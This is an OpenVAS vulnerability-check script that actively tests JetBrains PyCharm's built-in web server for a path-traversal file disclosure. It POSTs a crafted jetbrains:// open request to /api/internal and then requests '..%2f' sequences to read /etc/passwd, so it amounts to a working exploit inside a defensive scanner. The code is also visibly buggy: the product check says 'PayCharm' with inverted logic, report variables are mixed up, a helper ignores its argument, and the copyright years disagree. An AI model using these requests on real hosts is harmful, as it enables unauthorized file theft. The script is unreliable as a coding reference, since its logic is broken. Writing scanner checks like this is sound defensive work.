###############################################################################

1. ###############################################################################
2. # OpenVAS Vulnerability Test
3. # $Id$
4. #
5. # JetBrains (Pycharm) Remote Code Execution and Local File Disclosure Vulnerability (Active Check)
6. #
7. # Authors:
8. # Tameem Eissa <tameem.eissa@greenbone.net>
9. #
10. # Copyright:
11. # Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net
12. #
13. # This program is free software; you can redistribute it and/or modify
14. # it under the terms of the GNU General Public License version 2
15. # (or any later version), as published by the Free Software Foundation.
16. #
17. # This program is distributed in the hope that it will be useful,
18. # but WITHOUT ANY WARRANTY; without even the implied warranty of
19. # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
20. # GNU General Public License for more details.
21. #
22. # You should have received a copy of the GNU General Public License
23. # along with this program; if not, write to the Free Software
24. # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
25. ###############################################################################
26.  
27. if(description)
28. {
29. script_oid("1.3.6.1.4.1.25623.1.0.107231");
30. script_version("$Revision$");
31. script_tag(name:"cvss_base", value:"5.0");
32. script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:N/A:N");
33. script_tag(name:"last_modification", value:"$Date$");
34. script_tag(name:"creation_date", value:"2017-08-21 10:25:40 +0530 (Mon, 21 Aug 2017)");
35. script_tag(name:"qod_type", value:"exploit");
36. script_name("JetBrains (Pycharm) Remote Code Execution and Local File Disclosure (Active Check)");
37.  
38. script_tag(name:"summary", value:"This host is installed with Jetbrains and is prone to multiple vulnerabilities.");
39.  
40. script_tag(name:"vuldetect", value:"Send a crafted request via HTTP Get and POST and
41. check The response.");
42.  
43. script_tag(name:"insight", value:"Multiple flaws are due to unproper escaping from the project directory.");
44.  
45. script_tag(name:"impact", value:"Successful exploitation will allow
46. remote attackers to read arbitrary files on the target system.
47.  
48. Impact Level: System/Application");
49.  
50. script_tag(name:"affected", value:"JetBrains Pycharm 2016 releases before May. Affected IDEs included also Android Studio, WebStorm, IntelliJ IDEA and several others. This check was done only for Pycharm IDE.");
51.  
52. script_tag(name: "solution" , value: "Patch is available at : https://blog.jetbrains.com/blog/2016/05/11/security-update-for-intellij-based-ides-v2016-1-and-older-versions/");
53.  
54. script_tag(name:"solution_type", value:"VendorFix");
55.  
56. script_xref(name : "URL" , value : "http://blog.saynotolinux.com/blog/2016/08/15/jetbrains-ide-remote-code-execution-and-local-file-disclosure-vulnerability-analysis/");
57.  
58. script_category(ACT_GATHER_INFO);
59. script_copyright("Copyright (C) 2015 Greenbone Networks GmbH");
60. script_family("Web application abuses");
61. script_dependencies("find_service.nasl");
62. exit(0);
63. }
64.  
65. include( "http_func.inc");
66. include( "http_keepalive.inc");
67. include( "misc_func.inc" );
68.  
69. function guessProjectName ()
70. {
71.  
72. Dictionary = make_list(
73. "ideas",
74. "purescript",
75. "image-analogies",
76. "powerline-shell",
77. "python-oauth2",
78. "create",
79. "jquery-boilerplate",
80. "sqlbrite",
81. "foresight.js",
82. "iOS-Core-Animation-Advanced-Techniques",
83. "elemental",
84. "peek",
85. "TheAmazingAudioEngine",
86. "orientdb",
87. "testing");
88.  
89. foreach name (Dictionary)
90. {
91.  
92. url = "/" + name + "/.idea/workspace.xml";
93. req = http_get_req( port: port, url: url, data: data, add_headers: make_array( 'Content-Type', 'application/xml', 'Connection', 'keep-alive' ) );
94.  
95.  
96. res = http_keepalive_send_recv( port: port, data: req );
97.  
98. if ( res =~ "HTTP/1.. 200" )
99. {
100. break;
101. }
102.  
103. }
104.  
105. if ( !isnull( name ) ) return name;
106.  
107. }
108.  
109. function buildDotsSegsToRoot( path )
110. {
111. i = 0;
112. depth = 0;
113. while (i < strlen( projectPath ) )
114. {
115. if ( projectPath[i] == "/" )
116. depth += 1;
117. i = i + 1;
118.  
119. }
120.  
121. for ( i = 0; i < depth; i = i + 1 )
122. {
123. dotSegs += "..%2f";
124. }
125. return dotSegs;
126. }
127.  
128. function leakWithPyCharmHelpers( res )
129. {
130.  
131. homePath = eregmatch( pattern: 'homePath": "(.*)"', string: res);
132. homePath = homePath[1];
133. projectName = "helpers";
134. projectPath = homePath + "/helpers";
135. url = "/api/internal";
136. data = '{"url": "jetbrains://whatever/open//' + projectPath + '"}' ;
137.  
138. req = http_post_req(port: port, url: url, data: data, add_headers: make_array( 'Content-Type', 'application/x-www-form-urlencoded', 'Connection', 'keep-alive' ) );
139.  
140.  
141. res = http_keepalive_send_recv( port: port, data: req );
142.  
143. dotSegs = buildDotsSegsToRoot( path: projectPath);
144.  
145. url = "/helpers" + "/" + dotSegs + "etc/passwd";
146.  
147. req = http_get_req( port: port, url: url, data: data, add_headers: make_array( 'Content-Type', 'application/xml', 'Connection', 'keep-alive' ) );
148.  
149. res = http_keepalive_send_recv( port: port, data: req, bodyonly: TRUE );
150.  
151. if ( res =~ "HTTP/1.. 200 OK" && egrep( pattern: ".*root:.*:0:[01]:.*", string: res ) )
152. {
153. security_message( port:port, data:report );
154.  
155. }
156.  
157. }
158.  
159. function leakWithProject(name)
160. {
161.  
162. dotSegs = "";
163. for ( i = 1; i < 5; i = i + 1 )
164. {
165.  
166. dotSegs += "..%2f";
167.  
168. url = "/" + name + "/" + dotSegs + "etc/passwd";
169.  
170. if (http_vuln_check(port: port, url: url, pattern: "root:.*:0:[01]:", check_header: TRUE, debug: TRUE))
171.  
172. {
173. report = report_vuln_url( port:port, url:url ) + '\n\n';
174.  
175. report += string( "Here are the contents of the file '/etc/passwd' that\n",
176. "OpenVAS was able to read from the remote host :\n",
177. "\n", res );
178. return report;
179.  
180. }
181.  
182. }
183. }
184.  
185. for ( port = 63342; port < 63352; port = port + 1){
186.  
187. if ( get_port_state ( port) ){
188.  
189. break;
190. }
191. }
192.  
193. if ( ! get_port_state ( port ) ) exit ( 0 );
194.  
195. random = rand_str( length: 13, charset: "0123456789" );
196.  
197. url = "/api/about?more-true?a=" + random;
198.  
199. req = http_get_req( port: port, url: url, data: data, add_headers: make_array( 'Content-Type', 'application/xml', 'Connection', 'keep-alive' ) );
200.  
201. res = http_keepalive_send_recv( port: port, data: req );
202.  
203. if ( ! res >< "PayCharm" ) exit ( 0 );
204.  
205.  
206. configPath = eregmatch( pattern: 'configPath": "(.*)config",', string: res );
207.  
208. if ( ! isnull ( configPath ) )
209. {
210.  
211. configPath = configPath[ 1 ] + "config";
212. Report = leakWithPyCharmHelpers( res );
213.  
214. }
215. else
216. {
217.  
218. ProjectName = guessProjectName();
219. if ( ! isnull( ProjectName ) )
220. {
221.  
222. Report = leakWithProject( name: ProjectName );
223.  
224. }
225.  
226. }
227.  
228. if ( isnull ( Report ) ) exit ( 0 );
229.  
230. security_message( port:port, data:Report );